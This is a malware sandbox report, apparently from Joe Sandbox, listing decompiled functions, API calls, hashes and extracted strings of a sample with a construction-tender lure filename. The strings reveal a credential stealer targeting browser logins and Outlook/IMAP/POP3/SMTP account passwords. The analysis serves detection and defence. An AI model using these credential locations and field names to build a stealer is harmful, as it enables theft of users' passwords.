                                                                                                                          APIs
                                                                                                                          • EnumResourceNamesA.KERNEL32(?,?,00410C68,00000000), ref: 00410D02
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: EnumNamesResource
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3334572018-0
                                                                                                                          • Opcode ID: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                                                                                          • Instruction ID: 5afcab74deb5f1f746bbc86617496166ce7982b7e139a3a4a0d32d3f52cd2e16
                                                                                                                          • Opcode Fuzzy Hash: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                                                                                          • Instruction Fuzzy Hash: 05C09B3119534197C7519F108C4DF1B7695BB59706F144D297191940A4D7514054DE05
                                                                                                                          Function 00407F90 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseFind
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1863332320-0
                                                                                                                          • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                                                          • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                                                                                                                          • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                                                          • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                                                                                                                          Function 00410A9C Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Open
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 71445658-0
                                                                                                                          • Opcode ID: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                                                                                          • Instruction ID: dc05f55a30c25c5fac933af4dde5d03becff9f0601af4caa575784a6c8c77920
                                                                                                                          • Opcode Fuzzy Hash: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                                                                                          • Instruction Fuzzy Hash: F4C09B35545301FFDE114F40FD45F09BB61AB84B05F004414B244240B182714414EB17
                                                                                                                          Function 00406F81 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AttributesFile
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3188754299-0
                                                                                                                          • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                                                          • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                                                                                                                          • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                                                          • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00

                                                                                                                          Non-executed Functions

                                                                                                                          Function 004033F0 Relevance: 7.6, Strings: 6, Instructions: 61COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: PrivateProfileString_mbscmpstrlen
                                                                                                                          • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                                                                                          • API String ID: 3963849919-1658304561
                                                                                                                          • Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                                                          • Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
                                                                                                                          • Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                                                          • Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
                                                                                                                          Function 0040E501 Relevance: 54.6, APIs: 21, Strings: 10, Instructions: 314COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                                                            • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                                                            • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                                                            • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                                                                                                                            • Part of subcall function 00408934: CloseHandle.KERNEL32(?,?), ref: 0040899C
                                                                                                                            • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                                                                                                                          • memset.MSVCRT ref: 0040E5B8
                                                                                                                          • memset.MSVCRT ref: 0040E5CD
                                                                                                                          • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E634
                                                                                                                          • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E64A
                                                                                                                          • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E660
                                                                                                                          • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E676
                                                                                                                          • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E68C
                                                                                                                          • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E69F
                                                                                                                          • memset.MSVCRT ref: 0040E6B5
                                                                                                                          • memset.MSVCRT ref: 0040E6CC
                                                                                                                            • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                                                                                                                            • Part of subcall function 004066A3: memcmp.MSVCRT(?,00456EA0,00000010,?,?,000000FF), ref: 004066EE
                                                                                                                          • memset.MSVCRT ref: 0040E736
                                                                                                                          • memset.MSVCRT ref: 0040E74F
                                                                                                                          • sprintf.MSVCRT ref: 0040E76D
                                                                                                                          • sprintf.MSVCRT ref: 0040E788
                                                                                                                          • _strcmpi.MSVCRT ref: 0040E79E
                                                                                                                          • _strcmpi.MSVCRT ref: 0040E7B7
                                                                                                                          • _strcmpi.MSVCRT ref: 0040E7D3
                                                                                                                          • memset.MSVCRT ref: 0040E858
                                                                                                                          • sprintf.MSVCRT ref: 0040E873
                                                                                                                          • _strcmpi.MSVCRT ref: 0040E889
                                                                                                                          • _strcmpi.MSVCRT ref: 0040E8A5
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                                                                                                          • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                                                                                                          • API String ID: 4171719235-3943159138
                                                                                                                          • Opcode ID: d167a2cf797b5d1909f19c572c007443fa0765fe7e0db263b7bd4f21149122ce
                                                                                                                          • Instruction ID: e6e1aca5762f927b6bef3ecf047b01a22afe4fa283f9592a273acc07610826c1
                                                                                                                          • Opcode Fuzzy Hash: d167a2cf797b5d1909f19c572c007443fa0765fe7e0db263b7bd4f21149122ce
                                                                                                                          • Instruction Fuzzy Hash: D6B152B2D04119AADF10EBA1DC41BDEB7B8EF04318F1444BBF548B7181EB39AA558F58
                                                                                                                          Function 00410401 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 264stringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                                                                                                                          • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                                                                                                                          • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                                                                                                                          • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                                                                                                                          • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 0041047C
                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00410487
                                                                                                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                                                                                                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                                                                                                                          • GetDC.USER32 ref: 004104E2
                                                                                                                          • strlen.MSVCRT ref: 00410522
                                                                                                                          • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                                                                                                                          • ReleaseDC.USER32(?,?), ref: 00410580
                                                                                                                          • sprintf.MSVCRT ref: 00410640
                                                                                                                          • SetWindowTextA.USER32(?,?), ref: 00410654
                                                                                                                          • SetWindowTextA.USER32(?,00000000), ref: 00410672
                                                                                                                          • GetDlgItem.USER32(?,00000001), ref: 004106A8
                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 004106B8
                                                                                                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                                                                                                                          • GetClientRect.USER32(?,?), ref: 004106DD
                                                                                                                          • GetWindowRect.USER32(?,?), ref: 004106E7
                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                                                                                                                          • GetClientRect.USER32(?,?), ref: 00410737
                                                                                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                                                                                          • String ID: %s:$EDIT$STATIC
                                                                                                                          • API String ID: 1703216249-3046471546
                                                                                                                          • Opcode ID: c45e47aa9121f830d125028a7f876627aec3aac4030610de851cfdb352c947b7
                                                                                                                          • Instruction ID: 9785898008ba7037e97d6a181d6b2a38f1c87ee61eba0ca9b836c22844d1efbd
                                                                                                                          • Opcode Fuzzy Hash: c45e47aa9121f830d125028a7f876627aec3aac4030610de851cfdb352c947b7
                                                                                                                          • Instruction Fuzzy Hash: 36B1DF75508341AFD750DFA8C985E6BBBE9FF88704F00492DF59982261DB75E804CF16
                                                                                                                          Function 0040244A Relevance: 45.6, APIs: 3, Strings: 23, Instructions: 132COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 004024F5
                                                                                                                            • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                                                                                          • _mbscpy.MSVCRT(?,00000000,?,?,?,75A8EB20,?,00000000), ref: 00402533
                                                                                                                          • _mbscpy.MSVCRT(?,?), ref: 004025FD
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _mbscpy$QueryValuememset
                                                                                                                          • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                                                                                          • API String ID: 168965057-606283353
                                                                                                                          • Opcode ID: 1065c6c96e973ba162a7e339d79e3b52940ae0a945bba20f0fb5bc86a04de48d
                                                                                                                          • Instruction ID: 7e64c7f7efb5926a908898138c7c80272d7c47f2ed846a803f17f87345e13469
                                                                                                                          • Opcode Fuzzy Hash: 1065c6c96e973ba162a7e339d79e3b52940ae0a945bba20f0fb5bc86a04de48d
                                                                                                                          • Instruction Fuzzy Hash: 0A5173B640221DABEF60DF91CC85ADD7BA8EF04318F54846BF908A7141D7BD9588CF98
                                                                                                                          Function 00401060 Relevance: 39.2, APIs: 26, Instructions: 186COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                                                                                          • LoadCursorA.USER32(00000067), ref: 0040115F
                                                                                                                          • SetCursor.USER32(00000000,?,?), ref: 00401166
                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                                                                                          • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                                                                                          • EndDialog.USER32(?,00000001), ref: 0040121A
                                                                                                                          • DeleteObject.GDI32(?), ref: 00401226
                                                                                                                          • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                                                                                          • ShowWindow.USER32(00000000), ref: 00401253
                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                                                                                          • ShowWindow.USER32(00000000), ref: 00401262
                                                                                                                          • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                                                                                                          • memset.MSVCRT ref: 0040128E
                                                                                                                          • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                                                                                          • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                                                                                          • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2998058495-0
                                                                                                                          • Opcode ID: 1304d1c8d715b31a593d177d1fcf49c0df4ecd0a9b3deb669dc5f6aa527f4ccf
                                                                                                                          • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                                                                                                                          • Opcode Fuzzy Hash: 1304d1c8d715b31a593d177d1fcf49c0df4ecd0a9b3deb669dc5f6aa527f4ccf
                                                                                                                          • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                                                                                                                          Function 0044257F Relevance: 33.4, APIs: 7, Strings: 15, Instructions: 375COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • memcmp.MSVCRT(?,file:,00000005,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 004425C8
                                                                                                                          • memcmp.MSVCRT(localhost,?,00000009,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442656
                                                                                                                          • memcmp.MSVCRT(vfs,00000001,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442800
                                                                                                                          • memcmp.MSVCRT(cache,00000001,00000005,00000000,00000000,BINARY), ref: 0044282C
                                                                                                                          • memcmp.MSVCRT(mode,00000001,00000004,00000000,00000000,BINARY), ref: 0044285E
                                                                                                                          • memcmp.MSVCRT(?,?,G+D,00000000,00000000,BINARY), ref: 004428A9
                                                                                                                          • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 0044293C
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcmp$memcpy
                                                                                                                          • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                                                                                                          • API String ID: 231171946-2189169393
                                                                                                                          • Opcode ID: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                                                          • Instruction ID: 1e7ca99fc42d5c672073ce6a9752caade8d3c68442cd6653d693641e17a54130
                                                                                                                          • Opcode Fuzzy Hash: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                                                          • Instruction Fuzzy Hash: 30D13671904245ABFF248F68CA407EEBBB1AF15305F54406FF844A7341D3F89A86CB99
                                                                                                                          Function 0041108D Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 101COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _mbscat$memsetsprintf$_mbscpy
                                                                                                                          • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                          • API String ID: 633282248-1996832678
                                                                                                                          • Opcode ID: 3118318c37942661f5fcffc3ac6ba245d9ce7bfece0bd670dd31aaefef13242f
                                                                                                                          • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                                                                                                                          • Opcode Fuzzy Hash: 3118318c37942661f5fcffc3ac6ba245d9ce7bfece0bd670dd31aaefef13242f
                                                                                                                          • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                                                                                                                          Function 004111AA Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 114COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: sprintf$memset$_mbscpy
                                                                                                                          • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                          • API String ID: 3402215030-3842416460
                                                                                                                          • Opcode ID: ea23fa7928f637b81322df5704cb4e79e7cdaf63d3e69134c948d1ddb26e9ea3
                                                                                                                          • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                                                                                                                          • Opcode Fuzzy Hash: ea23fa7928f637b81322df5704cb4e79e7cdaf63d3e69134c948d1ddb26e9ea3
                                                                                                                          • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                                                                                                                          Function 0040F0CE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 192stringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                                                                                                            • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                                                                                                                            • Part of subcall function 004080D4: free.MSVCRT ref: 004080DB
                                                                                                                            • Part of subcall function 00407035: _mbscpy.MSVCRT(?,?,0040F113,?,?,?,?,?), ref: 0040703A
                                                                                                                            • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                                                                                                            • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                                                                                                            • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                                                                                                            • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                                                                                                            • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                                                                            • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                                                                            • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                                                                                                          • strlen.MSVCRT ref: 0040F139
                                                                                                                          • strlen.MSVCRT ref: 0040F147
                                                                                                                          • memset.MSVCRT ref: 0040F187
                                                                                                                          • strlen.MSVCRT ref: 0040F196
                                                                                                                          • strlen.MSVCRT ref: 0040F1A4
                                                                                                                          • memset.MSVCRT ref: 0040F1EA
                                                                                                                          • strlen.MSVCRT ref: 0040F1F9
                                                                                                                          • strlen.MSVCRT ref: 0040F207
                                                                                                                          • _strcmpi.MSVCRT ref: 0040F2B2
                                                                                                                          • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F2CD
                                                                                                                          • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F30E
                                                                                                                            • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                            • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
